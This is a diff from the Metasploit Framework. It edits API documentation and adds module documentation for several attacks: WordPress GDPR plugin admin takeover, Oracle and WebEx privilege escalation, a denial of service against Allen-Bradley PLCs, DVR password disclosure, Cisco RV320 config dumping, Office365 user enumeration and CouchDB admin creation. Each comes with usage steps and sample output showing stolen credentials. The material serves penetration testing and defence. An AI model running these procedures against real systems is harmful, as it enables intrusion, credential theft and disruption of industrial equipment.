AUTH_MESSAGE_DESC = 'A message describing the authentication error that occurred.'
|
||||
LIMIT_DEFAULT = 100
|
||||
LIMIT_DESC = "The maximum number of results that will be retrieved from the query. (Default: #{LIMIT_DEFAULT})"
|
||||
OFFSET_DEFAULT = 0
|
||||
OFFSET_DESC = "The number of results the query will begin reading from the beginning of the set. (Default: #{OFFSET_DEFAULT})"
|
||||
ORDER_DESC = 'The order in which results are returned, based on the created_at datetime. (Default: desc)'
|
||||
ORDER_ENUM = [
|
||||
'asc',
|
||||
'desc'
|
||||
]
|
||||
|
||||
DEFAULT_RESPONSE_200 = 'Successful operation.'
|
||||
DEFAULT_RESPONSE_401 = 'Authenticate to access this resource.'
|
||||
|
|
|
@ -187,7 +187,7 @@ module ServiceApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/services/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing service.'
|
||||
key :description, 'Update the attributes on an existing service.'
|
||||
key :tags, [ 'service' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -86,7 +86,7 @@ module SessionApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/sessions/{id}' do
|
||||
# Swagger documentation for api/v1/sessions/:id GET
|
||||
# Swagger documentation for /api/v1/sessions/:id GET
|
||||
operation :get do
|
||||
key :description, 'Return a specific session that is stored in the database.'
|
||||
key :tags, [ 'session' ]
|
||||
|
|
|
@ -32,6 +32,35 @@ module SessionEventApiDoc
|
|||
key :description, 'Return session events that are stored in the database.'
|
||||
key :tags, [ 'session_event' ]
|
||||
|
||||
parameter do
|
||||
key :name, :limit
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::LIMIT_DESC
|
||||
key :example, RootApiDoc::LIMIT_DEFAULT
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
key :required, false
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :offset
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::OFFSET_DESC
|
||||
key :example, RootApiDoc::OFFSET_DEFAULT
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
key :required, false
|
||||
end
|
||||
|
||||
parameter do
|
||||
key :name, :order
|
||||
key :in, :query
|
||||
key :description, RootApiDoc::ORDER_DESC
|
||||
key :type, :string
|
||||
key :required, false
|
||||
key :enum, RootApiDoc::ORDER_ENUM
|
||||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Returns session event data.'
|
||||
schema do
|
||||
|
@ -59,7 +88,7 @@ module SessionEventApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
# Swagger documentation for /api/v1/session events POST
|
||||
# Swagger documentation for /api/v1/session-events POST
|
||||
operation :post do
|
||||
key :description, 'Create a session events entry.'
|
||||
key :tags, [ 'session_event' ]
|
||||
|
@ -105,15 +134,15 @@ module SessionEventApiDoc
|
|||
end
|
||||
|
||||
swagger_path '/api/v1/session-events/{id}' do
|
||||
# Swagger documentation for api/v1/session-events/:id GET
|
||||
# Swagger documentation for /api/v1/session-events/:id GET
|
||||
operation :get do
|
||||
key :description, 'Return a specific session_event that is stored in the database.'
|
||||
key :description, 'Return a specific session event that is stored in the database.'
|
||||
key :tags, [ 'session_event' ]
|
||||
|
||||
parameter do
|
||||
key :name, :id
|
||||
key :in, :path
|
||||
key :description, 'ID of session_event to retrieve.'
|
||||
key :description, 'ID of session event to retrieve.'
|
||||
key :required, true
|
||||
key :type, :integer
|
||||
key :format, :int32
|
||||
|
|
|
@ -15,10 +15,9 @@ module VulnApiDoc
|
|||
ORIGIN_ID_DESC = 'ID of the associated origin record.'
|
||||
ORIGIN_TYPE_DESC = 'The origin type of this vuln.'
|
||||
REFS_DESC = 'An array of public reference IDs for this vuln.'
|
||||
REF_ID_DESC = 'The ID of the related Mdm::ModuleRef or Mdm::VulnRef associated with this vuln.'
|
||||
REF_ID_DESC = 'The ID of the related Mdm::Ref associated with this vuln.'
|
||||
REF_NAME_DESC = 'Designation for external reference. May include a prefix for the authority, such as \'CVE-\', in which case the rest of the name is the designation assigned by that authority.'
|
||||
REFS_EXAMPLE = ['CVE-2008-4250','OSVDB-49243','MSB-MS08-067']
|
||||
MODULE_REF_DETAIL_ID_DESC = 'The ID of the Mdm::Module::Detail record this ModuleRef is associated with.'
|
||||
|
||||
# Swagger documentation for vulns model
|
||||
swagger_schema :Vuln do
|
||||
|
@ -32,24 +31,12 @@ module VulnApiDoc
|
|||
property :vuln_attempt_count, type: :integer, format: :int32, description: VULN_ATTEMPT_COUNT
|
||||
property :origin_id, type: :integer, format: :int32, description: ORIGIN_ID_DESC
|
||||
property :origin_type, type: :string, description: ORIGIN_TYPE_DESC
|
||||
property :vuln_refs do
|
||||
key :type, :array
|
||||
items do
|
||||
key :'$ref', :VulnRef
|
||||
end
|
||||
end
|
||||
property :refs do
|
||||
key :type, :array
|
||||
items do
|
||||
key :'$ref', :Ref
|
||||
end
|
||||
end
|
||||
property :module_refs do
|
||||
key :type, :array
|
||||
items do
|
||||
key :'$ref', :ModuleRef
|
||||
end
|
||||
end
|
||||
property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
|
||||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
@ -63,21 +50,6 @@ module VulnApiDoc
|
|||
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
swagger_schema :ModuleRef do
|
||||
key :required, [:name]
|
||||
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
|
||||
property :detail_id, type: :integer, format: :int32, description: MODULE_REF_DETAIL_ID_DESC
|
||||
property :name, type: :string, required: true, description: REF_NAME_DESC
|
||||
end
|
||||
|
||||
swagger_schema :VulnRef do
|
||||
key :required, [:ref_id, :vuln_id]
|
||||
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
|
||||
property :ref_id, type: :integer, format: :int32, description: RootApiDoc::CREATED_AT_DESC
|
||||
property :vuln_id, type: :integer, format: :int32, description: RootApiDoc::UPDATED_AT_DESC
|
||||
end
|
||||
|
||||
|
||||
swagger_path '/api/v1/vulns' do
|
||||
# Swagger documentation for /api/v1/vulns GET
|
||||
operation :get do
|
||||
|
@ -239,7 +211,7 @@ module VulnApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/vulns/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing vuln.'
|
||||
key :description, 'Update the attributes on an existing vuln.'
|
||||
key :tags, [ 'vuln' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -173,7 +173,7 @@ module WorkspaceApiDoc
|
|||
|
||||
# Swagger documentation for /api/v1/workspaces/:id PUT
|
||||
operation :put do
|
||||
key :description, 'Update the attributes an existing workspaces.'
|
||||
key :description, 'Update the attributes on an existing workspace.'
|
||||
key :tags, [ 'workspace' ]
|
||||
|
||||
parameter :update_id
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
## Description
|
||||
|
||||
This module exploits the [Wordpress GDPR compliance plugin](https://wordpress.org/plugins/wp-gdpr-compliance/) lack of validation ([WPVDB 9144](https://wpvulndb.com/vulnerabilities/9144)), which affects versions 1.4.2 and lower.
|
||||
|
||||
When a user triggers GDPR-related actions, Wordpress's `admin-ajax.php` is called but fails to do validation and capacity checks regarding the asked actions. This leads to any unauthenticated user being able to modify any arbitrary settings on the targeted server.
|
||||
|
||||
This module changes the admin email (optional) to prevent notification sending, enables new user registration, changes the default role of new users to Administrator, and registers a new user that can be used for authentication. The attacker can then log in and take any actions on the newly compromised site.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[GDPR Compliance plugin <= 1.4.2](https://downloads.wordpress.org/plugin/wp-gdpr-compliance.1.4.2.zip)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. `./msfconsole`
|
||||
3. `use auxiliary/admin/http/wp_gdpr_compliance_privesc`
|
||||
4. `set RHOST [wp host]`
|
||||
5. `set RPORT [wp port]`
|
||||
6. `set EMAIL [email address]`
|
||||
7. `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Debian 9.6 running Wordpress 4.7.5 with WordPress GDPR Compliance plugin 1.4.2:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/admin/http/wp_gdpr_compliance_privesc
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set verbose true
|
||||
verbose => true
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set rhosts 172.22.222.145
|
||||
rhosts => 172.22.222.145
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set email test@example.com
|
||||
email => test@example.com
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > check
|
||||
|
||||
[*] Checking /wp-content/plugins/wp-gdpr-compliance/readme.txt
|
||||
[*] Found version 1.4.2 of the plugin
|
||||
[*] 172.22.222.145:80 The target appears to be vulnerable.
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > exploit
|
||||
|
||||
[*] Getting security token from host...
|
||||
[!] Enabling user registrations...
|
||||
[!] Setting the default user role type to administrator...
|
||||
[*] Registering msfuser with email test@example.com
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) >
|
||||
```
|
|
@ -0,0 +1,28 @@
|
|||
## Vulnerable Application
|
||||
|
||||
1. [Install Oracle Database](http://www.oracle.com/technetwork/indexes/downloads/index.html#database)
|
||||
2. [Insert the "Scott/Tiger" test data](http://www.orafaq.com/wiki/SCOTT)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Connect via sqlplus, and check current privileges:
|
||||
1. Ex: `sqlplus SCOTT/TIGER@192.168.3.100:1521/XEXDB`
|
||||
2. Ex: `SELECT * FROM session_privs`
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/admin/oracle/oracle_index_privesc```
|
||||
4. Do: set ```SQL```, and ```TABLE``` if desired
|
||||
5. Do: ```exploit```
|
||||
6. Reconnect with sqlplus and check privileges post-exploit:
|
||||
1. Ex: `sqlplus SCOTT/TIGER@192.168.3.100:1521/XEXDB`
|
||||
2. Ex: `SELECT * FROM session_privs`
|
||||
|
||||
## Options
|
||||
|
||||
**SQL**
|
||||
|
||||
The SQL that will execute with the privileges of the user who created the index. Default is to escalate privileges.
|
||||
|
||||
**TABLE**
|
||||
|
||||
Table to create the index on.
|
|
@ -0,0 +1,47 @@
|
|||
## Description
|
||||
|
||||
This module exploits a remote code execution vulnerability in Cisco's WebEx client software versions < v33.6.0.655
|
||||
By supplying valid login credentials to the target machine, a single command can be executed with System privileges.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Cisco WebEx Client v33.3.8.7 and below
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/admin/smb/webexec_command```
|
||||
4. Do: ```set RHOSTS <IP>```
|
||||
5. Do: ```set SMBUser <USERNAME>```
|
||||
6. Do: ```set SMBPass <PASSWORD>```
|
||||
7. Do: ```run```
|
||||
8. You should get output that verifies the execution of the command
|
||||
|
||||
## Options
|
||||
|
||||
**FORCE_GUI**
|
||||
|
||||
Uses WMIC to create a GUI
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/admin/smb/webexec_command
|
||||
msf5 auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136
|
||||
rhosts => 192.168.37.136
|
||||
msf5 auxiliary(admin/smb/webexec_command) > set smbuser a_user
|
||||
smbuser => a_user
|
||||
msf5 auxiliary(admin/smb/webexec_command) > set smbpass password
|
||||
smbpass => password
|
||||
msf5 auxiliary(admin/smb/webexec_command) > run
|
||||
|
||||
[+] 192.168.37.136:445 - Command completed!
|
||||
[*] 192.168.37.136:445 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(admin/smb/webexec_command) >
|
||||
```
|
|
@ -0,0 +1,36 @@
|
|||
## Vulnerable Application
|
||||
|
||||
A remote, unauthenticated attacker could send a single, specially crafted Programmable Controller Communication Commands (PCCC) packet to the controller that could potentially cause the controller to enter a DoS condition.
|
||||
MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and 1763-L16DWD.
|
||||
CVE-2017-7924 has been assigned to this vulnerability.
|
||||
A CVSS v3 base score of 7.5 has been assigned.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use auxiliary/dos/scada/allen_bradley_pccc`
|
||||
2. Do: `set RHOST=IP` where IP is the IP address of the target
|
||||
3. Do: `check` verify if target is vulnerable
|
||||
4. Do: `exploit` send DoS packet
|
||||
|
||||
## Options
|
||||
|
||||
1. PORT: `set RPORT=44818`
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use auxiliary/dos/scada/allen_bradley_pccc
|
||||
msf auxiliary(dos/scada/allen_bradley_pccc) > set RHOST 172.27.248.194
|
||||
RHOST => 172.27.248.194
|
||||
msf auxiliary(dos/scada/allen_bradley_pccc) > check
|
||||
|
||||
[*] 172.27.248.194:44818 - Product Name: 1763-L16BWA B/14.00
|
||||
[+] 172.27.248.194:44818 - The target is vulnerable.
|
||||
msf auxiliary(dos/scada/allen_bradley_pccc) > exploit
|
||||
|
||||
[*] 172.27.248.194:44818 - Ethernet/IP - Session created (id 0xaf79a666)
|
||||
[*] 172.27.248.194:44818 - CIP Connection Manager - Forward Open Success (Connection id 0x66a66e85)
|
||||
[*] 172.27.248.194:44818 - Sending PCCC DoS magic packet...
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
|
@ -0,0 +1,76 @@
|
|||
## Description
|
||||
|
||||
C2S DVR allows an unauthenticated user to disclose the username
|
||||
& password by requesting the javascript page 'read.cgi?page=2'.
|
||||
This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This module has been verified against the mock vulnerable page listed below.
|
||||
|
||||
### Mock Vulnerable Page
|
||||
|
||||
These instructions will create a cgi environment and a vulnerable perl application for exploitation.
|
||||
Kali rolling (2019.1) was utilized for this tutorial, with apache.
|
||||
|
||||
#### Setup
|
||||
|
||||
1. Enable cgi: `a2enmod cgid`
|
||||
2. `mkdir /var/www/html/cgi-bin`
|
||||
3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
|
||||
4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/read.cgi`:
|
||||
|
||||
```
|
||||
#!/usr/bin/perl
|
||||
use CGI qw(:standard);
|
||||
$query = new CGI;
|
||||
print $query->header( -type=> "text/javascript"),
|
||||
$query->import_names( 'Q' );
|
||||
|
||||
my $data = <<'DATA';
|
||||
var pw_enflag = "1";
|
||||
var pw_adminpw = "12345";
|
||||
var pw_retype1 = "12345";
|
||||
var pw_userpw = "56789";
|
||||
var pw_retype2 = "56789";
|
||||
var pw_autolock = "0";
|
||||
DATA
|
||||
|
||||
if ($Q::page == 2) {
|
||||
print $data;
|
||||
}
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. ```use auxiliary/gather/c2s_dvr_password_disclosure```
|
||||
3. ```set rhosts [rhosts]```
|
||||
4. ```run```
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Against the Mock page listed above
|
||||
|
||||
```
|
||||
resource (c2s.rb)> use auxiliary/gather/c2s_dvr_password_disclosure
|
||||
resource (c2s.rb)> set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
resource (c2s.rb)> set verbose true
|
||||
verbose => true
|
||||
resource (c2s.rb)> exploit
|
||||
[*] Attempting to load data from /cgi-bin/read.cgi?page=2
|
||||
[+] Found: admin:12345
|
||||
[+] Found: user:56789
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
[*] Starting persistent handler(s)...
|
||||
msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
127.0.0.1 127.0.0.1 80/tcp (http) admin 12345 Password
|
||||
127.0.0.1 127.0.0.1 80/tcp (http) user 56789 Password
|
||||
```
|
|
@ -0,0 +1,124 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router. The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).
|
||||
|
||||
An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information. On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side. On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
|
||||
|
||||
More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use auxiliary/gather/cisco_rv320_config`
|
||||
3. `set RHOSTS 192.168.1.1` (default LAN IP) or to the WAN interface
|
||||
4. `run`
|
||||
5. Review the downloaded configuration file cited in the output. For example:
|
||||
>```
|
||||
>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt
|
||||
>```
|
||||
6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
|
||||
|
||||
## Options
|
||||
|
||||
*SSL*: Should be set to 'true' for port 443 and set to 'false' for port 80 or port 8007.
|
||||
|
||||
*TARGETURI*: Should point to the `/cgi-bin/config.exp` endpoint and likely should never be changed.
|
||||
|
||||
## Scenarios
|
||||
|
||||
#### Against firmware version 1.4.2.15, which on the LAN side, port 443:
|
||||
|
||||
```
|
||||
msf5 >
|
||||
msf5 > use auxiliary/gather/cisco_rv320_config
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
|
||||
RHOSTS => 192.168.1.1
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > run
|
||||
|
||||
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### Against firmware version 1.4.2.15, on the WAN side, port 8007:
|
||||
|
||||
```
|
||||
msf5 >
|
||||
msf5 > use auxiliary/gather/cisco_rv320_config
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 172.16.0.34
|
||||
RHOSTS => 192.168.1.1
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
|
||||
RPORT => 8007
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
|
||||
SSL => false
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > run
|
||||
|
||||
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### Against firmware version 1.4.2.17, which on the LAN side, port 443:
|
||||
|
||||
```
|
||||
msf5 >
|
||||
msf5 > use auxiliary/gather/cisco_rv320_config
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
|
||||
RHOSTS => 192.168.1.1
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > run
|
||||
|
||||
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### Against newer firmware (>= 1.4.2.19):
|
||||
|
||||
```
|
||||
msf5 >
|
||||
msf5 > use auxiliary/gather/cisco_rv320_config
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
|
||||
RHOSTS => 192.168.1.1
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > run
|
||||
|
||||
[-] Auxiliary aborted due to failure: not-vulnerable: Response suggests device is patched
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### If module succeeds, check the database:
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > hosts
|
||||
|
||||
Hosts
|
||||
=====
|
||||
|
||||
address mac name os_name os_flavor os_sp purpose info comments
|
||||
------- --- ---- ------- --------- ----- ------- ---- --------
|
||||
172.16.0.34 70:E4:22:94:E7:20 router94e720 Cisco RV320
|
||||
192.168.1.1 70:E4:22:94:E7:20 router94e720 Cisco RV320
|
||||
```
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
172.16.0.34 192.168.1.1 8007/tcp (http) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
|
||||
192.168.1.1 192.168.1.1 443/tcp (https) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
|
||||
```
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > loot
|
||||
|
||||
Loot
|
||||
====
|
||||
|
||||
host service type name content info path
|
||||
---- ------- ---- ---- ------- ---- ----
|
||||
172.16.0.34 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt
|
||||
192.168.1.1 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
|
||||
```
|
|
@ -0,0 +1,77 @@
|
|||
External python module compatible with v2 and v3.
|
||||
|
||||
Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
|
||||
Differences in the HTTP Response code and HTTP Headers can be used to differentiate between:
|
||||
|
||||
- Valid Username (Response code 401)
|
||||
- Valid Username and Password without 2FA (Response Code 200)
|
||||
- Valid Username and Password with 2FA (Response Code 403)
|
||||
- Invalid Username (Response code 404 with Header X-CasErrorCode: UserNotFound)
|
||||
|
||||
Note this behaviour appears to be limited to Office365, MS Exchange does not appear to be affected.
|
||||
|
||||
Microsoft Security Response Center stated on 2017-06-28 that this issue does not "meet the bar for security servicing". As such it is not expected to be fixed any time soon.
|
||||
|
||||
This script is maintaing the ability to run independently of MSF.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Office365's implementation of ActiveSync
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Create a file containing candidate usernames (aka email addresses), one per line.
|
||||
2. Do: ```use auxiliary/gather/office365userenum```
|
||||
3. Do: ```set users [USER_FILE]``` with the file you created.
|
||||
4. Do: ```run```
|
||||
5. Valid and Invalid usernames will be printed out to the screen.
|
||||
|
||||
## Options
|
||||
|
||||
LOGFILE = Output file to use for verbose logging.
|
||||
OUTPUT = Output file for results.
|
||||
PASSWORD = Password to use during enumeration. Note this must exist
|
||||
but does not necessarily need to be valid. If it is
|
||||
found to be valid for an account it will be reported.
|
||||
THREADS = Number of concurrent requests to use during enumeration.
|
||||
TIMEOUT = HTTP request timeout to use during enumeration.
|
||||
URL = URL of Office365 ActiveSync service.
|
||||
USERS = Input fie containing candidate usernames, one per line.
|
||||
VERBOSE = Enable/Disable DEBUG logging
|
||||
|
||||
|
||||
## Scenarios
|
||||
The following demonstrates basic usage, using the supplied users wordlist
|
||||
and default options.
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/office365userenum) > set users /home/msfdev/users
|
||||
users => /home/msfdev/users
|
||||
msf5 auxiliary(gather/office365userenum) > run
|
||||
|
||||
[*]
|
||||
|
||||
. .1111... | Title: office365userenum.py
|
||||
.10000000000011. .. | Author: Oliver Morton (Sec-1 Ltd)
|
||||
.00 000... | Email: oliverm@sec-1.com
|
||||
1 01.. | Description:
|
||||
.. | Enumerate valid usernames from Office 365 using
|
||||
.. | ActiveSync.
|
||||
GrimHacker .. | Requires: Python 2.7 or 3.6, python-requests
|
||||
.. |
|
||||
grimhacker.com .. |
|
||||
@grimhacker .. |
|
||||
----------------------------------------------------------------------------
|
||||
This program comes with ABSOLUTELY NO WARRANTY.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions. See GPLv2 License.
|
||||
----------------------------------------------------------------------------
|
||||
|
||||
[+] 401 VALID_USER valid_username@example.com:Password1
|
||||
[-] 404 INVALID_USER invalid_username@example.com:Password1
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## References
|
||||
https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/
|
|
@ -20,54 +20,77 @@ The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https
|
|||
|
||||
## Options
|
||||
|
||||
**serverinfo**
|
||||
**SERVERINFO**
|
||||
|
||||
If set to true, the server info will also enumerated and set in msf's DB. Defaults to `false`
|
||||
If set to `true`, the server info will also enumerated and set in msf's DB. Defaults to `false`.
|
||||
|
||||
**CREATEUSER**
|
||||
|
||||
If set to `true`, the server info will attempt to create an account in CouchDB using configured credentials (limited to CVE-2017-12635 conditions). Defaults to `false`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the configuration from these docs
|
||||
Dumping databases with `SERVERINFO` and `CREATEUSER` set:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/afp/afp_login) > use auxiliary/scanner/couchdb/couchdb_enum
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 1.1.1.1
|
||||
rhosts => 1.1.1.1
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true
|
||||
verbose => true
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run
|
||||
```
|
||||
msf5 > use auxiliary/scanner/couchdb/couchdb_enum
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > options
|
||||
|
||||
[+] 1.1.1.1:5984 {
|
||||
"couchdb": "Welcome",
|
||||
"uuid": "6f08e89795bd845efc6c2bf3d57799e5",
|
||||
"version": "1.6.1",
|
||||
"vendor": {
|
||||
"version": "16.04",
|
||||
"name": "Ubuntu"
|
||||
}
|
||||
Module options (auxiliary/scanner/couchdb/couchdb_enum):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CREATEUSER false yes Create Administrative user
|
||||
HttpPassword IJvoGDWAWzQo yes CouchDB Password
|
||||
HttpUsername CQuXQnVwQAow yes CouchDB Username
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target address range or CIDR identifier
|
||||
ROLES _admin yes CouchDB Roles
|
||||
RPORT 5984 yes The target port (TCP)
|
||||
SERVERINFO false yes Print server info
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI /_all_dbs yes Path to list all the databases
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set serverinfo true
|
||||
serverinfo => true
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set createuser true
|
||||
createuser => true
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true
|
||||
verbose => true
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > check
|
||||
|
||||
[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
|
||||
[*] 127.0.0.1:5984 - The target appears to be vulnerable.
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run
|
||||
|
||||
[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
|
||||
[+] 127.0.0.1:5984 - User CQuXQnVwQAow created with password IJvoGDWAWzQo. Connect to http://127.0.0.1:5984/_utils/ to login.
|
||||
[+] 127.0.0.1:5984 - {
|
||||
"couchdb": "Welcome",
|
||||
"version": "2.1.0",
|
||||
"features": [
|
||||
"scheduler"
|
||||
],
|
||||
"vendor": {
|
||||
"name": "The Apache Software Foundation"
|
||||
}
|
||||
[*] #{peer} Enumerating Databases...
|
||||
[+] 1.1.1.1:5984 Databases:
|
||||
}
|
||||
[*] 127.0.0.1:5984 - Enumerating Databases...
|
||||
[+] 127.0.0.1:5984 - Databases:
|
||||
|
||||
[
|
||||
"_replicator",
|
||||
"_users"
|
||||
]
|
||||
[
|
||||
"_global_changes",
|
||||
"_replicator",
|
||||
"_users"
|
||||
]
|
||||
|
||||
